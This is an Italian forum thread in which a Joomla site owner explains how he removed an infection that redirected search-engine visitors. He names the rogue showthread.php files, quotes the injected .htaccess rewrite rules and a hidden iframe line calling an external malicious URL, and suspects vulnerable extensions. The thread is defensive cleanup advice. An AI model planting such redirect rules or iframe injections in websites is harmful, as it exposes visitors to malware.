REDIRECT TO met-a-morph by showthread.php [HACKED JOOMLA 1.5.26]

[Ultima]

Ciao a tutti!


Scrivo questo veloce topic sperando che risulti utile a qualcuno che come me si è trovato da un giorno all'altro il sito hackerato.


Il problema è che il sito è accessibile solamente in maniera diretta, ovvero digitando l'indirizzo completo nel browser tramite la barra degli indirizzi.
Anche accedendo al sito attraverso link diretti presenti ad esempio in pagine facebook tutto è funzionante come sempre.


Invece se si prova ad accedere al sito da un qualsiasi motore di ricerca, come google ad esempio, il sito non è visibile!
Quello che si visualizza è una pagina totalmente bianca e nella barra degli indirizzi il seguente url:
*******


Non so come hanno fatto questi maledetti so solo che mi hanno fatto perdere mezza giornata e che molte persone mi hanno (per fortuna) contattato per dirmi che il mio sito era down. [figuraccia]




Qui vi elenco in maniera concisa tutto ciò che ho fatto per riportare il mio sito a lavorare alla perfezione:


1) Cambiare tutte le password e tutti gli username di accesso a qualsiasi cosa sia collegata al mio sito.
Esempi: email, pannello di controllo del hosting, joomla, FTP, phpmyadmin, ecc ecc ... !!!


2) Mettere il sito offiline


3) Connettersi al sito in ftp tramite filezilla e usare la funzione: Server -> Search Remote Files ...


4) Cercare il file:  showthread.php


5) Eliminare TUTTI I FILE TROVATI


6) Modificare il file .htaccess presente nella root directory eliminado tutte le righe racchiuse nel target:
  <IfModule mod_rewrite.c>


7) Rimettere online il sito web




Il virus sembra essere composto da due file:
showthread.php     e    .htaccess


che si propagano in svariate cartelle per essere raggiungibili in vari modi e quindi difficilmente eliminabili.
Nel primo ci sono le direttive da effetuare e nel secondo la redirect da aggiungere al sito.


Io avevo circa 70 files showthread.php !!!!!!




Eliminate se volete anche tutti gli .htaccess  tranne naturalmente quello vostro principale che si trova nella ROOT DIRECTORY!


Quello dovete modificarlo eliminando le prime righe che hanno questa forma:



<IfModule mod_rewrite.c>


   RewriteEngine On
   RewriteBase /


   RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
   RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
   RewriteRule ^.*$ ******** [L,R]


</IfModule>




Per adesso, non avendo tempo, questi sono i passi che ho effettuato sul mio dominio per ripristinarlo.
Adesso tutto sembra essere tornato alla perfezione.


Il problema è che non ho capito la natura di questo attacco. Cioè come è stato eseguito.


Se è un problema della versione di joomla che ho e cioè la 1.5.26  oppure se è dovuto a qualche componente che ho installato o plugin che presenta qualche falla...


Per evitare che ciò avvenga di nuvo al più presto effettuerò una migrazione all'utlima versione stabile di joomla e riaggiornerò tutti i vari componenti e plugin.


Vi consiglio vivamente di fare lo stesso


Buona fortuna! 




EDIT: Ho notato che al ripristino del mio sito tutto funzionava come prima tranne un componente .. ovvero


Exposè 4 -


è un componente che utilizzavo per mostrare una gallery di fotografie ..
credo che la falla sia dovuta a lui ...
e lavorandoci sopra vedo che cerca di connettersi ad un url del tipo:


******


Al più presto provvederò ad eliminarlo dal mio sito e a trovare un buon sostituto.


Se ci sono persone che ne sanno più di me per favore si facessero sentire!!!


Grazie a tutti!
 
Edit: Rimossi link malevoli.

[Michele1968_sa]

Ciao,
vorrei chiederti hai trovato qualche soluzione per questo problema che si è verificato al tuo sito web ?
 
Grazie

[Ultima]

Ciao,
si pare che alla fine ho risolto!

Il problema credo sia stato dovuto ad un estensione che avevo installata e che si chiama QContacts, per la gestione dei contatti. Controlla subito se è presente nel tuo joomla!
Pare che sia affetta da un problema di attacco chiamato SQL Injection.

Quello che ho fatto io è eliminare tutti gli showthread.php presenti nel mio server remoto e eliminare anche tutti gli htaccess.txt (tranne quello principale presente nella cartella di root, il quale va modificato controllando che non ci siano righe di codice sospette.. in particolare le prime righe racchiuse nel target:

Codice: [Seleziona]

<IfModule mod_rewrite.c>
Inoltre devi controllare tutti i file INDEX.HTML e tutti i file con estensione .JS e .PHP prensenti nel tuo server !

Lo so è un lavoraccio ed è una pazzia ... io ci ho perso una nottata però alla fine in questo modo ho risolto.
Perchè controllare tutti questi file?
Perchè lo script malevolo è andato ad aggiungere delle righe di codice dannose in quasi tutti i file javascript (.js) , php (.php) , e html (in particolare gli index.html)

Quindi dovresti armarti di tanta tanta pazienza e controllare manualmente uno ad uno tutti questi file e NOTERAI CHE QUASI SEMPRE O ALL'INIZIO O ALLA FINE DEL FILE CI SONO DUE RIGHE DI CODICE SEMPRE UGUALI E DANNOSE! contenenti righe simili a questa:

Codice: [Seleziona]

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://micasafoundation.org/showthread.php?sid=46154></iframe></body>

Dopo di che è importante aggiornare tutte le estensioni installate, eliminandone alcune eventualmente inutilizzate e controllare di avere l'utlima versione di joomla installata.. Questo non significa che devi avere necessariamente la 3.x e nemmeno la 2.x
Puoi benissimo avere la 1.5.x però in questo caso devi avere l'utlima e cioè la 1.5.26

A questo punto se hai qcontacts devi IMMEDIATAMENTE SOSTITUIRLO.
Grazie a Dio c'è qualcuno che ha scoperto la sua falla e si è messo a lavorare per correggere il problema. Pare che ci sia riuscito.
Questa persona ha reso disponibile il nuovo pacchetto il quale non è pià vulnerabile.
E' scaricabile dal seguente link:
http://forum.joomla.org/viewtopic.php?t=685243
(dal secondo post in particolare..)

Adesso il mio sito pare sia tornato "sano", anche se conto al più presto di installare una nuovissima installazione di joomla per evitare qualsiasi altro problema dando una rinfrescata completa al mio sito.

Spero di esserti stato di aiuto [/code]